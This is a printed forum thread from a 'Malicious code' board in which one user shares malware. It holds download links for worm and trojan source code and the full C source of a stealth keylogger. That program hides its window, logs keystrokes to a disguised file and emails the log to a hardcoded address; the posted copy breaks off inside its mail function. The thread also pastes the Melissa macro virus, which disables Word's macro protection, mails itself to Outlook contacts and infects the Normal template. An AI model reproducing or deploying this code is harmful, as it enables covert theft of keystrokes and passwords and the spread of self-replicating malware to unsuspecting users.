Parsi Coders
Source Code Virus & Worm - نسخه قابل چاپ

+- Parsi Coders (http://parsicoders.com)
+-- انجمن: Security and influence (http://parsicoders.com/forumdisplay.php?fid=59)
+--- انجمن: Influence (http://parsicoders.com/forumdisplay.php?fid=61)
+---- انجمن: Malicious code (http://parsicoders.com/forumdisplay.php?fid=62)
+---- موضوع: Source Code Virus & Worm (/showthread.php?tid=318)



Source Code Virus & Worm - Amin_Mansouri - 05-22-2011

Source Code Worm New Folder:
Make Autorun.inf
Disable Task Manager
Disable Show Hidden File
Close Setup Nod 32
Copy Worm (Memory Or Hard Disk)
Programming by Visual basic 6
Download:
http://up.iranblog.com/images/qwtk6rodgqxbbmorkk3.rar
source code Trojan Full Source Code (Visual Basic 6)
سورس کد تروجان کامل تروجان
لینک دانلود :
http://irchat.hpage.com/get_file.php?id=1173514&vnr=651791


RE: Source Code Virus & Worm - Amin_Mansouri - 05-22-2011

به دلیل مشکل فنی تایپک پاک شد و دوباره ایجاد شد .
با عرض پوزش


RE: Source Code Virus & Worm - Amin_Mansouri - 05-23-2011

An article on developing hook based key loggers and hook safe software
Download :
http://irchat.hpage.com/get_file.php?id=1174509&vnr=795755


RE: Source Code Virus & Worm - Amin_Mansouri - 05-23-2011

[Source-Code] Create your own keylogger!

کد:
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
*                                       *
* File: keymail.c  Ver. 0.7                         *
*                                       *
* Purpose: a stealth (somewhat) key logger, writes to a log file then sends  *
* and email to whoever is set in the #define options at compile time.     *
* This code is for educational uses, don't be an ass hat with it.       *
* White Scorpion (www.white-scorpion.nl) did the initial work on the key   *
* logger, but he has gone on to bigger and better things.           *
* This version was crafted by Irongeek (www.Irongeek.com), who tacked on   *
* some code to make it send emails, along with a few other changes.      *
* If some of the code is crappy, blame Irongeek and not White Scorpion.    *
* Please send Irongeek improvements and he will post the changes and give you *
* credit for your contributions.                       *
*                                       *
* This program is free software; you can redistribute it and/or        *
* modify it under the terms of the GNU General Public License         *
* as published by the Free Software Foundation; either version 2       *
* of the License, or (at your option) any later version.           *
*                                       *
* This program is distributed in the hope that it will be useful,       *
* but WITHOUT ANY WARRANTY; without even the implied warranty of       *
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the        *
* GNU General Public License for more details.                *
*                                       *
* You should have received a copy of the GNU General Public License      *
* along with this program; if not, write to the Free Software         *
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. *
*                                       *
* Change log:                                 *
*   1/3/06 On Ed Rguyl's recommendation I changed how malloc was used.   *
*   6/22/06 Added the date and time functionality using ctime and fixed   *
*       a bug where subject was being defined twice.(ThVoidedLine)   *
*                                       *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
/*
Compile notes: I used Dev-C++ 4.9.9.2 to compie this. if you get an error like:
    Linker error] undefined reference to `WSAStartup@8'
Add this:
     -lws2_32
to Tools->Compiler Options under the section on compile flags.
*/

#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>
#include <time.h>
int MailIt (char *mailserver, char *emailto, char *emailfrom,
char *emailsubject, char *emailmessage);
#define BUFSIZE 800
#define waittime 500
/*If you don't know the mail exchange server for an address for the following
"nslookup -querytype=mx gmail.com" but replace gmail.com with the domain for
whatever email address you want. YOU MUST CHANGE THESE SETTINGS OR
IT WILL NOT WORK!!! */
#define cmailserver "gmail-smtp-in.l.google.com"
#define cemailto "irong33k@gmail.com"
#define cemailfrom "irong33k@gmail.com"
#define LogLength 100
#define FileName "sound.wav"
#define SMTPLog "ring.wav"
#define cemailsubject "Logged"

int test_key(void);
int main(void)
{
  //Uncomment the lines below to put the keylogger in stealh mode.
  HWND stealth; /*creating stealth */
  AllocConsole();
  stealth=FindWindowA("ConsoleWindowClass",NULL);
  ShowWindow(stealth,0);
  
  {FILE *file;
  file=fopen(FileName,"a+");
  time_t theTime=time(0);
  fputs("\nStarted logging: ", file);
  fputs(ctime(&theTime),file);
  fclose(file);
  }
  
  /* if (test==2)
  {//the path in which the file needs to be
  char *path="c:\\%windir%\\svchost.exe";
  create=create_key(path);    
  } */
  
  int t=get_keys();  
  return t;
}

int get_keys(void)
{
int freadindex;
char *buf;
long len;
FILE *file;
file=fopen(FileName,"a+");


      short character;
       while(1)
       {
          sleep(10);/*to prevent 100% cpu usage*/
          for(character=8;character<=222;character++)
          {
            if(GetAsyncKeyState(character)==-32767)
            {
              FILE *file;
              file=fopen(FileName,"a+");
              if(file==NULL)
              {
                  return 1;
              }      
              if(file!=NULL)
              {    
                  if((character>=39)&&(character<=64))
                  {
                     fputc(character,file);
                     fclose(file);
                     break;
                  }    
                  else if((character>64)&&(character<91))
                  {
                     character+=32;
                     fputc(character,file);
                     fclose(file);
                     break;
                  }
                  else
                  {
                    switch(character)
                    {
                       case VK_SPACE:
                       fputc(' ',file);
                       fclose(file);
                       break;  
                       case VK_SHIFT:
                       fputs("\r\n[SHIFT]\r\n",file);
                       fclose(file);
                       break;                      
                       case VK_RETURN:
                       fputs("\r\n[ENTER]\r\n",file);
                       fclose(file);
                       break;
                       case VK_BACK:
                       fputs("\r\n[BACKSPACE]\r\n",file);
                       fclose(file);
                       break;
                       case VK_TAB:
                       fputs("\r\n[TAB]\r\n",file);
                       fclose(file);
                       break;
                       case VK_CONTROL:
                       fputs("\r\n[CTRL]\r\n",file);
                       fclose(file);
                       break;  
                       case VK_DELETE:
                       fputs("\r\n[DEL]\r\n",file);
                       fclose(file);
                       break;
                       case VK_OEM_1:
                       fputs("\r\n[;:]\r\n",file);
                       fclose(file);
                       break;
                       case VK_OEM_2:
                       fputs("\r\n[/?]\r\n",file);
                       fclose(file);
                       break;
                       case VK_OEM_3:
                       fputs("\r\n[`~]\r\n",file);
                       fclose(file);
                       break;
                       case VK_OEM_4:
                       fputs("\r\n[ [{ ]\r\n",file);
                       fclose(file);
                       break;
                       case VK_OEM_5:
                       fputs("\r\n[\\|]\r\n",file);
                       fclose(file);
                       break;                
                       case VK_OEM_6:
                       fputs("\r\n[ ]} ]\r\n",file);
                       fclose(file);
                       break;
                       case VK_OEM_7:
                       fputs("\r\n['\"]\r\n",file);
                       fclose(file);
                       break;
                       case 187:
                       fputc('+',file);
                       fclose(file);
                       break;
                       case 188:
                       fputc(',',file);
                       fclose(file);
                       break;
                       case 189:
                       fputc('-',file);
                       fclose(file);
                       break;
                       case 190:
                       fputc('.',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD0:
                       fputc('0',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD1:
                       fputc('1',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD2:
                       fputc('2',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD3:
                       fputc('3',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD4:
                       fputc('4',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD5:
                       fputc('5',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD6:
                       fputc('6',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD7:
                       fputc('7',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD8:
                       fputc('8',file);
                       fclose(file);
                       break;
                       case VK_NUMPAD9:
                       fputc('9',file);
                       fclose(file);
                       break;
                       case VK_CAPITAL:
                       fputs("\r\n[CAPS LOCK]\r\n",file);
                       fclose(file);
                       break;
                       default:
                       fclose(file);
                       break;
                    }    
                 }  
               }    
          }  
        }        
      FILE *file;
      file=fopen(FileName,"rb");
      fseek(file,0,SEEK_END); //go to end
      len=ftell(file); //get position at end (length)
      if(len>=LogLength) {
       fseek(file,0,SEEK_SET);//go to beg.
       buf=(char *)malloc(len);//malloc buffer
       freadindex=fread(buf,1,len,file);//read into buffer
       buf[freadindex] = '\0';//Extra bit I have to add to make it a sting
       MailIt( cmailserver, cemailto, cemailfrom, cemailsubject, buf);
       fclose(file);
       file=fopen(FileName,"w");            
       }
      
      fclose(file);
      //free (buf);
        
      }
      return EXIT_SUCCESS;              
}

int MailIt (char *mailserver, char *emailto, char *emailfrom,
char *emailsubject, char *emailmessage) {
  SOCKET sockfd;
  WSADATA wsaData;
  FILE *smtpfile;
  
  #define bufsize 300
  int bytes_sent;  /* Sock FD */
  int err;
  struct hostent *host;  /* info from gethostbyname */
  struct sockaddr_in dest_addr;  /* Host Address */
  char line[1000];
  char *Rec_Buf = (char*) malloc(bufsize+1);
  smtpfile=fopen(SMTPLog,"a+");
  if (WSAStartup(0x202,&wsaData) == SOCKET_ERROR) {
   fputs("WSAStartup failed",smtpfile);
   WSACleanup();
   return -1;
  }
  if ( (host=gethostbyname(mailserver)) == NULL) {
    perror("gethostbyname");
    exit(1);
  }
  memset(&dest_addr,0,sizeof(dest_addr));
  memcpy(&(dest_addr.sin_addr),host->h_addr,host->h_length);

   /* Prepare dest_addr */
   dest_addr.sin_family= host->h_addrtype; /* AF_INET from gethostbyname */
   dest_addr.sin_port= htons(25); /* PORT defined above */

   /* Get socket */

   if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
    perror("socket");
    exit(1);
    }
   /* Connect !*/
   fputs("Connecting....\n",smtpfile);

  if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
    perror("connect");
    exit(1);
    }
   sleep(waittime);
   err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
   fputs(Rec_Buf,smtpfile);
   strcpy(line,"helo me.somepalace.com\n");
   fputs(line,smtpfile);
   bytes_sent=send(sockfd,line,strlen(line),0);
   sleep(waittime);
   err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
   fputs(Rec_Buf,smtpfile);
   strcpy(line,"MAIL FROM:<");
   strncat(line,emailfrom,strlen(emailfrom));
   strncat(line,">\n",3);
   fputs(line,smtpfile);
   bytes_sent=send(sockfd,line,strlen(line),0);
   sleep(waittime);
   err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
   fputs(Rec_Buf,smtpfile);
   strcpy(line,"RCPT TO:<");
   strncat(line,emailto,strlen(emailto));
   strncat(line,">\n",3);
   fputs(line,smtpfile);
   bytes_sent=send(sockfd,line,strlen(line),0);
   sleep(waittime);
   err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
   fputs(Rec_Buf,smtpfile);
   strcpy(line,"DATA\n");
   fputs(line,smtpfile);
   bytes_sent=send(sockfd,line,strlen(line),0);
   sleep(waittime);
   err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
   fputs(Rec_Buf,smtpfile);
   sleep(waittime);
   strcpy(line,"To:");
   strcat(line,emailto);
   strcat(line,"\n");
   strcat(line,"From:");
   strcat(line,emailfrom);
   strcat(line,"\n");
   strcat(line,"Subject:");
   strcat(line,emailsubject);
   strcat(line,"\n");
   strcat(line,emailmessage);
   strcat(line,"\r\n.\r\n");
   fputs(line,smtpfile);
   bytes_sent=send(sockfd,line,strlen(line),0);
   sleep(waittime);
   err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
   fputs(Rec_Buf,smtpfile);
   strcpy(line,"quit\n");
   fputs(line,smtpfile);
   bytes_sent=send(sockfd,line,strlen(line),0);
   sleep(waittime);
   err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
   fputs(Rec_Buf,smtpfile);
   fclose(smtpfile);            
   #ifdef WIN32
   closesocket(sockfd);
   WSACleanup();
   #else
   close(sockfd);



RE: Source Code Virus & Worm - Amin_Mansouri - 06-25-2011


کد:
// Melissa Virus Source Code
  
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Mic*ft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Mic*ft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Mic*ft\Office\", "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
     For y = 1 To DasMapiName.AddressLists.Count
         Set AddyBook = DasMapiName.AddressLists(y)
         x = 1
         Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
         For oo = 1 To AddyBook.AddressEntries.Count
             Peep = AddyBook.AddressEntries(x)
             BreakUmOffASlice.Recipients.Add Peep
             x = x + 1
             If x > 50 Then oo = AddyBook.AddressEntries.Count
          Next oo
          BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
          BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else;-)"
          BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
          BreakUmOffASlice.Send
          Peep = ""
     Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Mic*ft\Office\",
"Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") =
False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters.  Game's over.
I'm outta here."
End Sub